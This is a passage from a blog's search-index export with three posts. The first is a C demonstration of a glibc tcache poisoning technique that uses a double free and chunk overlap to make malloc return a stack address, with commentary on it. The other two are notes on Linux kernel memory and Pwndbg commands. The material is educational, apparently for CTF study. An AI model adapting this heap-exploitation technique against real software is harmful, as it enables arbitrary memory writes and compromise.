class="hljs-keyword">include</span> <span class="hljs-string"><assert.h></span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-comment">/*</span><br><span class="hljs-comment"> * This attack should bypass the restriction introduced in</span><br><span class="hljs-comment"> * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d</span><br><span class="hljs-comment"> * If the libc does not include the restriction, you can simply double free the victim and do a</span><br><span class="hljs-comment"> * simple tcache poisoning</span><br><span class="hljs-comment"> * And thanks to @anton00b and @subwire for the weird name of this technique */</span><br><br> <span class="hljs-comment">// disable buffering so _IO_FILE does not interfere with our heap</span><br> <span class="hljs-built_in">setbuf</span>(stdin, <span class="hljs-literal">NULL</span>);<br> <span class="hljs-built_in">setbuf</span>(stdout, <span class="hljs-literal">NULL</span>);<br> <br> <span class="hljs-comment">// introduction</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"This file demonstrates a powerful tcache poisoning attack by tricking malloc into"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"returning a pointer to an arbitrary location (in this demo, the stack)."</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"This attack only relies on double free.\n"</span>);<br> <br> <span class="hljs-comment">// prepare the target</span><br> <span class="hljs-type">intptr_t</span> stack_var[<span class="hljs-number">4</span>];<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"The address we want malloc() to return, namely,"</span>);<br> <span class="hljs-built_in">printf</span>(<span 
class="hljs-string">"the target address is %p.\n\n"</span>, stack_var);<br> <br> <span class="hljs-comment">// prepare heap layout</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Preparing heap layout"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later."</span>);<br> <span class="hljs-type">intptr_t</span> *x[<span class="hljs-number">7</span>];<br> <span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i=<span class="hljs-number">0</span>; i<<span class="hljs-built_in">sizeof</span>(x)/<span class="hljs-built_in">sizeof</span>(<span class="hljs-type">intptr_t</span>*); i++){<br> x[i] = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> }<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating a chunk for later consolidation"</span>);<br> <span class="hljs-type">intptr_t</span> *prev = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating the victim chunk."</span>);<br> <span class="hljs-type">intptr_t</span> *a = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"malloc(0x100): a=%p.\n"</span>, a); <br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating a padding to prevent consolidation.\n"</span>);<br> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<br> <br> <span class="hljs-comment">// cause chunk overlapping</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Now we are able to cause chunk overlapping"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 1: fill up tcache list"</span>);<br> <span 
class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i=<span class="hljs-number">0</span>; i<<span class="hljs-number">7</span>; i++){<br> <span class="hljs-built_in">free</span>(x[i]);<br> }<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 2: free the victim chunk so it will be added to unsorted bin"</span>);<br> <span class="hljs-built_in">free</span>(a);<br> <br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 3: free the previous chunk and make it consolidate with the victim chunk."</span>);<br> <span class="hljs-built_in">free</span>(prev);<br> <br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n"</span>);<br> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-comment">/*VULNERABILITY*/</span><br> <span class="hljs-built_in">free</span>(a);<span class="hljs-comment">// a is already freed</span><br> <span class="hljs-comment">/*VULNERABILITY*/</span><br> <br> <span class="hljs-comment">// simple tcache poisoning</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Launch tcache poisoning"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapped chunk"</span>);<br> <span class="hljs-type">intptr_t</span> *b = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x120</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"We simply overwrite victim's fwd pointer"</span>);<br> b[<span class="hljs-number">0x120</span>/<span class="hljs-number">8</span><span class="hljs-number">-2</span>] = (<span class="hljs-type">long</span>)stack_var;<br> <br> <span class="hljs-comment">// take target out</span><br> <span 
class="hljs-built_in">puts</span>(<span class="hljs-string">"Now we can cash out the target chunk."</span>);<br> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-type">intptr_t</span> *c = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"The new chunk is at %p\n"</span>, c);<br> <br> <span class="hljs-comment">// sanity check</span><br> <span class="hljs-built_in">assert</span>(c==stack_var);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Got control on target/stack!\n\n"</span>);<br> <br> <span class="hljs-comment">// note</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Note:"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"In that case, once you have done this exploitation, you can have many arbitrary writes very easily."</span>);<br> <br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><h2 id="达成目的"><a href="#达成目的" class="headerlink" title="Goal"></a>Goal</h2><p>Cause a tcache dup, then use the tcache to have a chunk allocated at an arbitrary address.</p><h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>Why prev and the consolidation are needed: a must no longer be a chunk in the unsorted bin.</p><p>Without the consolidation, the double free is still possible, but malloc(0x120) then takes the chunk from the unsorted bin. By that point a's fd has already been modified to point to the next tcache chunk, so the condition checked below is not satisfied.</p><figure class="highlight lisp"><table><tr><td class="code"><pre><code class="hljs lisp">if (<span class="hljs-name">__glibc_unlikely</span> (<span
class="hljs-name">bck->fd</span> != victim)<br><br> || __glibc_unlikely (<span class="hljs-name">victim->fd</span> != unsorted_chunks (<span class="hljs-name">av</span>)))<br><br> malloc_printerr (<span class="hljs-string">"malloc(): unsorted double linked list corrupted"</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure><p>On older versions (below 2.29), an unsorted bin attack does not really work here either: it overwrites fd, and fd requires a libc leak.</p>]]></content>
<tags>
<tag>house of series</tag>
</tags>
</entry>
<entry>
<title>Linux kernel: memory management</title>
<link href="/2021/08/05/linue-memory-manage/"/>
<url>/2021/08/05/linue-memory-manage/</url>
<content type="html"><![CDATA[<p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108127090169-f784d99c-da06-40cb-b500-ed48b1be83ac.png"></p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108127090214-f0f9dfd2-7899-43ae-816e-34403c36ac1d.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108127455693-b47c1227-0223-48f0-afdd-9057abac5753.png"></p><p>For an application's heap, code, stack and so on, a lazy allocation mechanism is used: only when a memory page is written is memory actually requested and the page table allocated. However, when the kernel requests memory with kmalloc, the corresponding memory is actually allocated, and the lazy mechanism is not used.</p>]]></content>
<tags>
<tag>linux kernel</tag>
</tags>
</entry>
<entry>
<title>Pwndbg: lessons learned</title>
<link href="/2021/08/04/Pwndbg%20%E7%BB%8F%E9%AA%8C%E6%80%BB%E7%BB%93/"/>
<url>/2021/08/04/Pwndbg%20%E7%BB%8F%E9%AA%8C%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="Pwndbg-经验总结"><a href="#Pwndbg-经验总结" class="headerlink" title="Pwndbg: lessons learned"></a>Pwndbg: lessons learned</h1><h2 id="有用的命令"><a href="#有用的命令" class="headerlink" title="Useful commands"></a>Useful commands</h2><figure class="highlight coq"><table><tr><td class="code"><pre><code class="hljs coq">e{b|<span class="hljs-type">d</span>|<span class="hljs-type">D</span>|<span class="hljs-type">f</span>|<span class="hljs-type">p</span>|<span class="hljs-type">q</span>|<span class="hljs-type">w</span>} Address [Values]<br>e{a|<span class="hljs-type">u</span>|<span class="hljs-type">za</span>|<span class="hljs-type">zu</span>} Address "String"<br>e Address [Values]<br></code></pre></td></tr></table></figure><blockquote><p>e: enters data in the same format as the most recent e* command.<br>ea and eza: write to memory as an ASCII string;<br>eu and ezu: write to memory as a Unicode string.<br>The eza and ezu commands write a terminating null; the ea and eu commands do not. The string must be enclosed in quotation marks.</p></blockquote><figure class="highlight bnf"><table><tr><td class="code"><pre><code class="hljs bnf">x/<span class="hljs-attribute"><n/f/u></span> <span class="hljs-attribute"><addr></span><br></code></pre></td></tr></table></figure><blockquote><p>n, f and u are optional parameters. n is a positive integer giving the length of memory to display, that is, how many addresses' worth of content to display going forward from the current address.<br>f is the display format, see above. If the address points to a string, the format can be s; if the address is an instruction address, the format can be i.<br>u is the number of bytes requested going forward from the current address; if it is not specified, GDB defaults to 4 bytes. The u parameter can be given as one of the following characters: b for a single byte, h for two bytes, w for four bytes, g for eight bytes. Once the byte length is specified, GDB starts at the specified memory address, reads and writes the specified number of bytes, and takes them out as a single value.</p></blockquote><h2 id="Telescope"><a href="#Telescope" class="headerlink" title="Telescope"></a>Telescope</h2><blockquote><p>Inspecting memory dumps is easy with the telescope command. It recursively dereferences a range of memory, letting you see everything at once.
As an added bonus, Pwndbg checks all of the available registers to see if they point into the memory range.</p></blockquote><h2 id="Search"><a href="#Search" class="headerlink" title="Search"></a>Search</h2><blockquote><p>Pwndbg makes searching the target memory space easy, with a complete and easy-to-use interface. Whether you’re searching for bytes, strings, or various sizes of integer values or pointers, it’s a simple command away.</p></blockquote><h2 id="ROP-Gadgets"><a href="#ROP-Gadgets" class="headerlink" title="ROP Gadgets"></a>ROP Gadgets</h2><blockquote><p>Pwndbg makes using ROPGadget easy with the actual addresses in the process.<br>Just use the rop command!</p></blockquote><h2 id="Process-State-Inspection"><a href="#Process-State-Inspection" class="headerlink" title="Process State Inspection"></a>Process State Inspection</h2><blockquote><p>Use the procinfo command in order to inspect the current process state, like UID, GID, Groups, SELinux context, and open file descriptors! Pwndbg works particularly well with remote GDB debugging like with Android phones, which PEDA, GEF, and vanilla GDB choke on.</p></blockquote><h2 id="Finding-Leaks"><a href="#Finding-Leaks" class="headerlink" title="Finding Leaks"></a>Finding Leaks</h2><blockquote><p>Finding leak chains can be done using the leakfind command. 
It recursively inspects address ranges for pointers, and reports on all pointers found.</p></blockquote><h2 id="some-heap-function"><a href="#some-heap-function" class="headerlink" title="Some heap functions"></a>Some heap functions</h2><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012051.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012023.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012105.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012119.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012145.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012201.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012209.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012219.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012232.png"></p>]]></content>
<tags>
<tag>debuger</tag>
</tags>
</entry>
</search>